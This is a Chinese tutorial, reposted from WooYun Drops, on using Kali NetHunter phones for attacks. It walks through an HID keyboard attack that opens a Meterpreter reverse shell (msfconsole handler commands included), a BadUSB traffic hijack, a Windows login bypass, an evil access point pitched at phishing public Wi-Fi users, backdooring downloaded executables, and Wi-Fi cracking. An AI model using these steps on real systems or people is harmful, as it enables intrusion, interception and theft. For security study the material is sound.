Pocket Hacking: NetHunter实战指南
0x00 前言
許多朋友都希望Hacking套件可以很方便的從PC移植到更便攜的手機(jī)或平板電腦上,而Offensive Security團(tuán)隊(duì)發(fā)布的Kali NetHunter則將這一期待變?yōu)楝F(xiàn)實(shí),通過(guò)移動(dòng)終端隨時(shí)隨地進(jìn)行Hacking,暫且美其名曰口袋Hacking.
Kali NetHunter是以Nexus(手機(jī)/平板)為基本硬件設(shè)備(新增對(duì)1+手機(jī)的支持),基于原生Android實(shí)現(xiàn)的便攜滲透測(cè)試平臺(tái).熟悉的Kali使其易于上手,而圖形化控制界面則使某些測(cè)試更易.基于此平臺(tái),工程師們也可自由發(fā)揮,加入個(gè)人項(xiàng)目.
關(guān)于NetHunter國(guó)內(nèi)外文章相對(duì)較少且重復(fù)度高,故在此將其主要實(shí)戰(zhàn)技巧加以整理介紹,以備各位愛(ài)好者參考.由于資料不足,難免出錯(cuò)之處,如有疏漏錯(cuò)誤,望不吝賜教.
0x01 硬件支持
NetHunter官網(wǎng)給出以下支持刷入NetHunter的手機(jī):
Nexus 4 (GSM) - “mako” Nexus 5 (GSM/LTE) - “hammerhead” Nexus 7 [2012] (Wi-Fi) - “nakasi” Nexus 7 [2012] (Mobile) - “nakasig” Nexus 7 [2013] (Wi-Fi) - “razor” Nexus 7 [2013] (Mobile) - “razorg” Nexus 10 (Tablet) - “mantaray” OnePlus One 16 GB - “bacon” OnePlus One 64 GB - “bacon”值得一提的是,2015年NetHunter更新,由于1+手機(jī)的廉價(jià)與高性能,其被加入支持列表.用1+手機(jī)的朋友有福了,以下刷機(jī)以Nexus5為例.
0x02 刷機(jī)流程
官網(wǎng)給出幾種刷機(jī)方式,推薦使用Windows引導(dǎo)刷機(jī)程序安裝.下載地址:
https://www.kali.org/offsec-nethunter-installer/Kali_v1.1.6.sfx.exe
打開(kāi)安裝引導(dǎo)程序,默認(rèn)路徑安裝
安裝后自動(dòng)運(yùn)行NetHunter Installer并更新,進(jìn)入引導(dǎo)安裝步驟
- Step1,選擇已有硬件設(shè)備型號(hào).
- Step2,安裝驅(qū)動(dòng)
可以通過(guò)Test Drivers測(cè)試是否安裝成功
- Step3,安裝選項(xiàng)
如已經(jīng)通過(guò)官網(wǎng)下載過(guò)刷機(jī)包,通過(guò)Browser選擇文件.下載鏈接 http://www.offensive-security.com/kali-linux-nethunter-download/ 下載后記得校驗(yàn)SHA1值.至于Android Flash Setting,因?yàn)閷?duì)Android L的支持還未完成,故尚未開(kāi)放選擇.
- Step4,下載文件
如圖示,下載所有依賴文件.
所有依賴包都為Ready可進(jìn)入下一步刷機(jī).
- Step5,解鎖設(shè)備
解鎖bootloader,注意需設(shè)置允許USB調(diào)試,手機(jī)會(huì)重啟解鎖.
- Step6,重置原Android
同樣再手機(jī)上勾選允許USB調(diào)試,注意數(shù)據(jù)會(huì)清空,記得備份.
- Step7,刷入NetHunter
經(jīng)過(guò)上一步重置手機(jī)后,需重新開(kāi)啟開(kāi)發(fā)者模式,此時(shí)可刷入Kali Linux鏡像并對(duì)手機(jī)進(jìn)行Root,所需時(shí)間相對(duì)較長(zhǎng).(注:如鏡像推送不成功,可以手工將kali_linux_nethunter_1.10_hammerhead_kitkat.zip復(fù)制到/sdcard/download/目錄進(jìn)行INSTALL)
- Final,安裝成功
0x03 推薦APP一覽
完成系統(tǒng)刷入后,要豐富NetHunter原裝工具,可以下載部分安卓APP以配合.以下為個(gè)人推薦
-
中文輸入法:作為一個(gè)漢語(yǔ)狗還是必備的
-
文件管理器(如RootExplorer):Kali某些文件需要通過(guò)支持Root權(quán)限的文件管理器.
-
ShadowSocks:梯子還是要有的
https://github.com/shadowsocks/shadowsocks-android/releases/download/v2.6.2/shadowsocks-nightly-2.6.2.apk
-
MiTM工具:
zANTI2:雖為商業(yè)化限制部分功能,但使用體驗(yàn)的確好些. dSploit:曾經(jīng)很出名 lanmitm:國(guó)內(nèi)安全工作者編寫(xiě)發(fā)布的工具 Intercepter-NG:嗅探工具 Network Spoofer:自帶許多調(diào)戲功能 -
IPTools:部分常見(jiàn)基本網(wǎng)絡(luò)工具集合
-
ChangeHostname:修改當(dāng)前手機(jī)主機(jī)名HostName(還是有必要的).
-
WiGLE wifi:War Driving工具,收集無(wú)線熱點(diǎn)信息,可保存到本地?cái)?shù)據(jù)庫(kù).
-
SQLiteEditor:方便讀取數(shù)據(jù)庫(kù)信息
-
Hacker's KeyBoard:NetHunter自帶,便于輸入各種控制字符
-
遠(yuǎn)程桌面:NetHunter自帶,便于連接VNC服務(wù).
-
DriveDroid:NetHunter自帶,將手機(jī)內(nèi)鏡像模擬為啟動(dòng)盤(pán).
0x04 目錄與服務(wù)
安裝好NetHunter,先要對(duì)其目錄與服務(wù)研究一番.Kali NetHunter根目錄對(duì)應(yīng)安卓系統(tǒng)目錄的/data/local/kali-armhf目錄
NetHunter自帶工具,也多在此目錄內(nèi).故如有抓包/日志等文件,找不到存放地址,不妨到此目錄下尋覓一番(注:需Root權(quán)限).另外,NetHunter某些工具運(yùn)行時(shí)的提示的目錄,也多以此處為根目錄.
通常,截獲的數(shù)據(jù)包等文件存放在NetHunter目錄下的Captures目錄:
與Kali Linux類似,/usr/share下存放了大部分工具,并建立link,命令行可直接調(diào)用.
而Metasploit則依然位于/opt/目錄下.
上圖中/opt/dic目錄則存放有字典文件,可自行補(bǔ)充.
此為/var/www目錄,想來(lái)大家也知道是何用處了:)
至于服務(wù),Offensive Security團(tuán)隊(duì)在新版中加入NetHunter Home以APP的形式管理服務(wù)開(kāi)關(guān),避免了之前版本通過(guò)WebServer管理的弊端(比如Web頁(yè)面調(diào)用Google Fonts被墻卡半天 ;)
如圖示,NetHunter Home為主頁(yè)面,除了Offensive Security的Banner,還可以獲取當(dāng)前IP(內(nèi)網(wǎng)/外網(wǎng))地址.
Kali Launcher整合了四個(gè)啟動(dòng)器:
- 終端打開(kāi)一個(gè)Kali Shell
- 終端打開(kāi)Kali NetHunter Menu
- 終端打開(kāi)Wifite進(jìn)入無(wú)線破解
- 更新Kali NetHunter(執(zhí)行sudo -c bootkali update)
對(duì)于NetHunter服務(wù)開(kāi)關(guān)控制,則在Kali Service Control面板里進(jìn)行設(shè)置
可看到,NetHunter可開(kāi)放服務(wù)有SSH,Dnsmasq,Hostapd,OpenVPN,Apache,Metasploit及BeEF FrameWork等.
- SSH服務(wù):Secure Shell,方便其他設(shè)備連接控制.
- Dnsmasq服務(wù):DNS解析服務(wù).
- Hostapd服務(wù):提供無(wú)線接入點(diǎn)服務(wù).
- OpenVPN服務(wù):開(kāi)放OpenVPN連入服務(wù).
- Apache服務(wù):WEB服務(wù).
- Metasploit服務(wù):為MSF攻擊模塊提供保障.
- BeEF FrameWork服務(wù):XSS利用框架服務(wù).
在此面板可對(duì)對(duì)應(yīng)服務(wù)進(jìn)行開(kāi)關(guān)設(shè)置.
0x05 Kali NetHunter Menu
在NetHunter Launcher中Kali Menu的啟動(dòng)項(xiàng),其包含整理有NetHunter常用工具,如圖:
與上一個(gè)版本相比,新增了以下選項(xiàng):
USB Attacks NFC Attacks Monitor Mode Eject USB Wifi主要模塊及介紹如下:
Wireless Attacks
-
Wifite
自動(dòng)無(wú)線安全審計(jì)工具
-
Kismet
無(wú)線WarDriving工具
-
AP F**ker
無(wú)線網(wǎng)惡意攻擊工具(多為拒絕服務(wù))
-
Wash
掃描開(kāi)啟WPS的無(wú)線網(wǎng)絡(luò)
-
Airodump-ng
基本無(wú)線攻擊套件(必備)
-
Pingen
針對(duì)某些開(kāi)啟WPS的D-link的路由器計(jì)算其PIN碼以破解
Sniffing/Spoofing
-
tcpdump
基本流量Dump工具
-
tshark
WireShark的Cli工具,可抓取分析流量
-
urlsnarf
Dsniff工具包一部分,可嗅探HTTP請(qǐng)求包內(nèi)容,并以CLF通用日志格式輸出
-
dsniff
強(qiáng)大的知名口令嗅探工具包
-
MITMproxy
中間代理,可截獲修改HTTP流量,參考官網(wǎng)介紹
Reverse Shells
-
AutoSSH
通過(guò)SSH反彈shell(NAT Bypass)
-
pTunnel
通過(guò)ICMP數(shù)據(jù)包隧道傳送數(shù)據(jù)
Info Gathering
-
Spiderfoot
開(kāi)源掃描與信息收集工具,對(duì)給定域名收集子域,Email地址,web服務(wù)器版本等信息,自動(dòng)化掃描.
-
Recon-ng
強(qiáng)大的信息收集工具,模塊化,可惜許多插件國(guó)內(nèi)不適用(有墻).
-
Device-pharmer
通過(guò)Shodan搜索,大數(shù)據(jù)Hacking.
Vulnerability Scan
-
OpenVas
漏洞掃描器,需額外安裝.Kali一直默認(rèn)包含,好不好用客官自行定奪. :)
Exploit Tools
-
Metasploit
強(qiáng)大,核心,必備
-
BeEF-XSS
XSS滲透測(cè)試工具,看個(gè)人習(xí)慣使用
-
Social-Engineering-Toolkit
Kali下的SET,社會(huì)工程學(xué)套件,功能強(qiáng)大.
-
MITMf
中間人攻擊框架,基于Python,擁有多個(gè)插件,滲透測(cè)試功能強(qiáng)大
OpenVPN Setup
OpenVPN設(shè)置
VNC Setup
VNC設(shè)置
Log/Capture Menu
可擦除本地所有抓取數(shù)據(jù)或同步到SD卡上(同步主要是解決權(quán)限問(wèn)題.比如多數(shù)安卓APP未獲得root權(quán)限是無(wú)法讀取NetHunter工具截獲的數(shù)據(jù)內(nèi)容)
USB Attacks
-
Dictionary based brute force attack
自動(dòng)輸入字典一行內(nèi)容并回車,基于HID,模擬操作方式的暴力破解
-
deADBolt
執(zhí)行一堆ADB命令可以推送隱私文件等信息到指定目錄,參考項(xiàng)目主頁(yè) https://github.com/photonicgeek/deADBolt
NFC Attack
提供了復(fù)制、重寫(xiě)、查看M卡數(shù)據(jù)功能(是不是不必帶上Acr122u了;)
Settings
- 修改時(shí)區(qū)
- 為Metasploit創(chuàng)建用戶和數(shù)據(jù)庫(kù)
- 修改MAC地址
- 安裝NodeJS
Service
- SSH服務(wù)開(kāi)關(guān)
- VNC服務(wù)開(kāi)關(guān)
- OpenVPN服務(wù)開(kāi)關(guān)
- 在本地啟動(dòng)Xserver
Monitor Mode
啟動(dòng)或關(guān)閉wlan1(外置無(wú)線網(wǎng)卡)的混雜監(jiān)聽(tīng)模式
Eject USB Wifi
彈出USB無(wú)線網(wǎng)卡
0x06 HID KeyBoard Attack
在過(guò)去,USB自啟往往依賴插入的USB設(shè)備中的autorun.inf實(shí)現(xiàn).時(shí)下這招往往不靈,而新興的USB HID Attack則成為新的安全威脅.USB HID可通過(guò)模擬鍵盤(pán)或鼠標(biāo)操作,實(shí)時(shí)執(zhí)行目標(biāo)代碼,在此以PowerSploit結(jié)合MSF為例:
首先運(yùn)行提供payload的webserver,在Kali Service Control中開(kāi)啟Apache服務(wù)器
轉(zhuǎn)到HID攻擊配置頁(yè)面,選擇PowerSploit
IP和端口填寫(xiě)MSF監(jiān)聽(tīng)的IP端口,Payload我們選擇windows/meterpreter/reverse_https,URL為提供Apache服務(wù)的IP,這里即本機(jī):192.168.1.151
配置好后UPDATE配置文件,接下來(lái)需配置MSF監(jiān)聽(tīng)反彈shell
root@kali:~# msfconsole -q msf > use exploit/multi/handler msf exploit(handler) >payload同HID配置頁(yè)面中的payload
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https PAYLOAD => windows/meterpreter/reverse_httpsIP和端口同樣設(shè)置
msf exploit(handler) > msf exploit(handler) > set LHOST 192.168.0.17 LHOST => 192.168.0.17 msf exploit(handler) > set LPORT 4444 LPORT => 443 msf exploit(handler) > exploit[*] Started HTTPS reverse handler on https://0.0.0.0:4444/ [*] Starting the payload handler...至此配置OK
開(kāi)始監(jiān)聽(tīng)
此時(shí)將設(shè)備連接至PC機(jī),等待設(shè)備被識(shí)別后,執(zhí)行Execute,攻擊開(kāi)始.
POWERSHELL命令執(zhí)行后,就可在msf中看到反彈的shell了:
如連上PC后沒(méi)有反應(yīng),可按Reset USB鍵更新.
當(dāng)然,HID KeyBoard Attack也提供了Windows CMD攻擊模塊,即連入計(jì)算機(jī)后自動(dòng)打開(kāi)CMD并執(zhí)行指定命令(默認(rèn)為添加新管理員用戶,可自由定制).
0x07 BadUSB MITM Attack
BadUSB Attack是BlackHat大會(huì)上公布的一種較先進(jìn)的USB攻擊方式,模擬鍵盤(pán)操作等Payload可自動(dòng)執(zhí)行某些操作,而NetHunter的BadUSB MiTM Attack則是其中一種玩法:修改網(wǎng)絡(luò)設(shè)定,劫持網(wǎng)絡(luò)流量.
關(guān)于BadUSB MITM Attack,NetHunter官網(wǎng)有演示視頻,詳見(jiàn)http://www.nethunter.com/showcase/,但并未交代詳細(xì)過(guò)程,以下筆者操作為例:
首先,確保手機(jī)連接目標(biāo)計(jì)算機(jī)時(shí),MTP文件傳輸是關(guān)閉的.連接目標(biāo)計(jì)算機(jī),打開(kāi)手機(jī)USB網(wǎng)絡(luò)共享:
此時(shí)在NetHunter Home打開(kāi)一個(gè)Kali Shell,查看網(wǎng)卡多出虛擬網(wǎng)卡rndis0(USB網(wǎng)絡(luò)共享網(wǎng)卡).
此時(shí)可以開(kāi)啟Tcpdump截獲流量,命令如:
tcpdump -i rndis0回到NetHunter Home,切換到BadUSB MiTM Attack,勾選右上角選項(xiàng)Start BadUSB Attack
被連接的計(jì)算機(jī)此時(shí)會(huì)多出一個(gè)網(wǎng)卡,網(wǎng)關(guān)為rndis0的IP地址
此時(shí)流量已可以截獲,例如訪問(wèn)某些網(wǎng)站,手機(jī)tcpdump處流量顯示如圖:
因?yàn)槭謾C(jī)并未插入SIM卡,無(wú)網(wǎng)絡(luò),故PC機(jī)并無(wú)法得到返回頁(yè)面.
之前有同學(xué)在Drops分享的一片文章Kali Nethunter初體驗(yàn)中提到:
出現(xiàn)雙網(wǎng)關(guān)現(xiàn)在所以并未像官網(wǎng)演示的那樣流量直接走向惡意網(wǎng)關(guān)(10.0.0.1)而是依舊走的之前的網(wǎng)關(guān)(192.168.1.1)故劫持失敗
這種情況也可能出現(xiàn),不過(guò)個(gè)人測(cè)試中,網(wǎng)絡(luò)連接優(yōu)先級(jí),默認(rèn)劫持后的網(wǎng)關(guān)優(yōu)先級(jí)更高,故流量可以正常劫持.也可能是NetHunter今年更新后做的優(yōu)化,如圖示:
當(dāng)然,配合HID Keyboard Attack進(jìn)行攻擊測(cè)試也是很好的方式,至于數(shù)據(jù)包的保存與分析,則可自行發(fā)揮.
0x08 繞過(guò)Windows登錄認(rèn)證
NetHunter其實(shí)有許多隱藏玩法,比如借助DriveDroid實(shí)現(xiàn)Windows登陸繞過(guò)密碼.
DriveDroid本是個(gè)允許通過(guò)安卓手機(jī)中的ISO/IMG鏡像文件引導(dǎo)啟動(dòng)PC機(jī)的一個(gè)App,但結(jié)合了特定的鏡像,實(shí)現(xiàn)繞過(guò)Windows登陸認(rèn)證就變得可行:)
在此以Win7為例,首先為默認(rèn)賬戶創(chuàng)建密碼hello.
DriveDroid默認(rèn)引導(dǎo)鏡像存放目錄位于SDCard/Download/images,只需將欲引導(dǎo)的鏡像存放于此目錄即可.
這里繞過(guò)Windows或OSX登陸認(rèn)證的鏡像為Kon-Boot.可以到官網(wǎng)了解,其原理在于處理BIOS修改系統(tǒng)內(nèi)核的引導(dǎo)處理,跳過(guò)SAM檢查,直接登陸系統(tǒng).因?yàn)槭歉顿M(fèi)軟件,以下以自行尋覓的鏡像為例演示.
關(guān)閉MTP文件傳輸,打開(kāi)DriveDroid,自動(dòng)列出images目錄下得鏡像文件.
選擇Kon-Boot.img鏡像掛載,模式這里選擇為Read-Only USB
加載成功后相應(yīng)鏡像有所標(biāo)志
而在連入的PC機(jī)中也會(huì)顯示加載有新的可移動(dòng)磁盤(pán)(或軟驅(qū)盤(pán)),如未能顯示,可在配置頁(yè)面進(jìn)行相應(yīng)調(diào)整(可通過(guò)USB Setup Wizard向?qū)е敢?
此時(shí)在設(shè)有密碼的PC機(jī)重啟,進(jìn)入BIOS設(shè)置啟動(dòng)項(xiàng)
如果鏡像加載成功,可以看到飛奔的圖案如下:
之后登陸用戶密碼處回車即可繞過(guò)密碼認(rèn)證登陸系統(tǒng)
需要說(shuō)明的是,通過(guò)此方式登陸系統(tǒng)無(wú)法直接修改或刪除系統(tǒng)密碼.
0x09 WarDriving
猶記得當(dāng)年前輩們肩扛筆記本做WarDriving的事跡,智能設(shè)備發(fā)展至今,WarDriving已可用便攜設(shè)備取代.只是至今遲遲沒(méi)有尋覓到比較合適直觀的WarDriving工具,期待有朋友能開(kāi)發(fā)或推薦個(gè).
在NetHunter下,Kali-Menu的Wireless模塊中Kismet作為WarDriving的默認(rèn)工具,不過(guò)操作起來(lái)畫(huà)面太美不敢看:
退而求其次,推薦使用App WigleWifi.不過(guò)注意不要不小心上傳數(shù)據(jù).使用easy,界面很難看.
好在數(shù)據(jù)可以以Sqlite數(shù)據(jù)庫(kù)格式存儲(chǔ)在本地.
0x10 Mana EvilAP蜜罐
想建個(gè)CMCC無(wú)線網(wǎng)絡(luò)釣魚(yú)劫持流量?PineApple沒(méi)有帶在身邊,不妨拿出手機(jī),開(kāi)個(gè)蜜罐吧. :)
Mana蜜罐采用與PineApple相同的:Hostapd的Karma補(bǔ)丁,可用來(lái)欺騙接入無(wú)線網(wǎng)絡(luò)用戶,使其可很平滑連接到虛假AP中,進(jìn)行后續(xù)攻擊.
需要說(shuō)明的是,NetHunter無(wú)線攻擊模塊,大都需要使用OTG外接USB無(wú)線網(wǎng)卡.主流芯片(可以試試Kali是否可直接識(shí)別)網(wǎng)卡均可.WN722N較為推薦,迷你的EDUP網(wǎng)卡通用性則較強(qiáng)(Raspberry Pi也可直接識(shí)別),只是信號(hào)強(qiáng)度..自然可想而知.
Mana蜜罐有多種Hacking模式,均為sh腳本,可自由定制.Mana工具安裝目錄為:
/usr/share/mana-toolkit啟動(dòng)腳本則在此處存放:
/usr/share/mana-toolkit/run-mana截獲流量文件存放于:
/var/lib/mana-toolkit通過(guò)NetHunter Home的Mana蜜罐頁(yè)面可方便的對(duì)配置文件進(jìn)行修改:
Hostapd配置文件
DHCP服務(wù)配置文件
DNS欺騙配置文件
服務(wù)啟動(dòng)腳本有多個(gè),均可自由編輯修改:
上圖對(duì)應(yīng)腳本start-nat-full.sh,腳本需要USB無(wú)線網(wǎng)卡(存在上行流量)啟動(dòng),無(wú)線連入為NAT模式,并啟動(dòng)所有腳本包括:firelamb,sslstrip,sslsplit等,截獲流量并保存.
start-nat-simple.sh同樣有上行流量,但并不啟動(dòng)firelamb,sslstrip,sslsplit等腳本.
start-nat-simple-bdf.sh,加入了BDF惡意代碼Inject工具,后面章節(jié)將對(duì)其攻擊思路進(jìn)行介紹.
此外,還有
start-noupstream.sh
Mana作為無(wú)法上網(wǎng)的虛假AP啟動(dòng),但可吸引WIFI默認(rèn)開(kāi)啟的終端自動(dòng)連接并抓取信息.start-noupstream-eap.sh
Mana同樣無(wú)法上網(wǎng),但會(huì)進(jìn)行EAP攻擊編輯好啟動(dòng)文件后,Start Attack,會(huì)彈窗勾選啟動(dòng)腳本:
即可啟動(dòng)服務(wù).
0x11 Backdooring Executable Over HTTP
這個(gè)攻擊思路就比較有趣了,新功能在NetHunter今年1月5號(hào)發(fā)布的版本中作為Kali Nethunter目前最新最酷炫的玩法,源于secret squirrel的github項(xiàng)目the-backdoor-factory和BDFProxy,可讓我們輕松地對(duì)使用HTTP協(xié)議傳送的二進(jìn)制文件注入shellcode.
首先建立一個(gè)Mana蜜罐,SSID這里使用默認(rèn)名稱internet,啟動(dòng)服務(wù)
cd /usr/share/mana-toolkit/run-mana ./start-nat-simple-bdf.sh再開(kāi)一個(gè)Shell,編輯bdfproxy.cfg,此配置文件包含了針對(duì)不同平臺(tái)默認(rèn)設(shè)置的payload,可自行更換.不過(guò)由于顯示問(wèn)題,用nano編輯文本會(huì)一行行刷新,還是換個(gè)方式編輯比較好.這里只把IP修改192.168.1.151,也可在Nethunter的主面板下的MANA Evil Access Point中進(jìn)行配置.
nano /etc/bdfproxy/bdfproxy.cfg配置好IP之后,在Shell中直接輸入bdfproxy運(yùn)行之.
再新開(kāi)一個(gè)Shell啟動(dòng)Metasploit
一切準(zhǔn)備就緒,等待連入蜜罐AP的PC機(jī)上網(wǎng)下載二進(jìn)制文件,在此通過(guò)百度下載everything(神器啊)演示:
運(yùn)行everthing,因?yàn)樽⑷肓藀ayload,會(huì)出現(xiàn)自校驗(yàn)失敗的提示
查看MSF,已成功反彈回Shell了.而上面自校驗(yàn)失敗的提示就是MeterPreter的screenshot幫我截取的 :)
不得不說(shuō),這個(gè)新特性真的很Cool.
0x12 Wifite破解
寫(xiě)到最后,還沒(méi)有提到無(wú)線破解是不科學(xué)的;) NetHunter推薦的Wifite破解工具是其最早集成的功能之一.移動(dòng)設(shè)備的便攜性更有利于隨時(shí)隨地進(jìn)行Wifi安全測(cè)試,只需掛載上外置無(wú)線網(wǎng)卡便可輕松抓包破解.不過(guò)并不建議直接在移動(dòng)設(shè)備上破解抓到的包,如跑幾分鐘沒(méi)結(jié)果,就拿高性能設(shè)備破解吧,否則易導(dǎo)致設(shè)備死機(jī).
連接好外置無(wú)線網(wǎng)卡后,在Nethunter主菜單選擇Launch Wifite即可進(jìn)入
選擇開(kāi)啟混雜監(jiān)聽(tīng)模式的網(wǎng)卡,選擇Wlan1
掃描開(kāi)始,每5秒更新一次,當(dāng)確認(rèn)攻擊目標(biāo)后CTRL+C停止掃描
輸入攻擊目標(biāo)序號(hào),這里就選XDSEC-WIFI了,輸入2
抓包成功后自動(dòng)調(diào)用字典破解,這里機(jī)智的把字典刪掉,其自動(dòng)退出
抓到的握手包存放在/data/local/kali-armhf/HS目錄下,命名規(guī)則是SSID+MAC
如果目標(biāo)開(kāi)啟WPS,則自動(dòng)進(jìn)行PIN碼破解.
Wifite相對(duì)傻瓜化,易操作,適合移動(dòng)終端.對(duì)無(wú)線網(wǎng)密碼測(cè)試筆者也成功過(guò)幾次,連入無(wú)線后結(jié)合zANTI等工具調(diào)戲即可:)
0x13 寫(xiě)在最后
文末,已將NetHunter大部分實(shí)戰(zhàn)玩法進(jìn)行相應(yīng)介紹,文章為卷毛zing同學(xué)與順毛le4f同學(xué)共同編寫(xiě),能力有限,如有不足之處望指出.拋磚引玉,期待有更多技巧分享.
原文地址: http://drops.wooyun.org/tips/4634
總結(jié)
以上是生活随笔為你收集整理的Pocket Hacking: NetHunter实战指南的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: Double Free浅析
- 下一篇: ARM Exploitation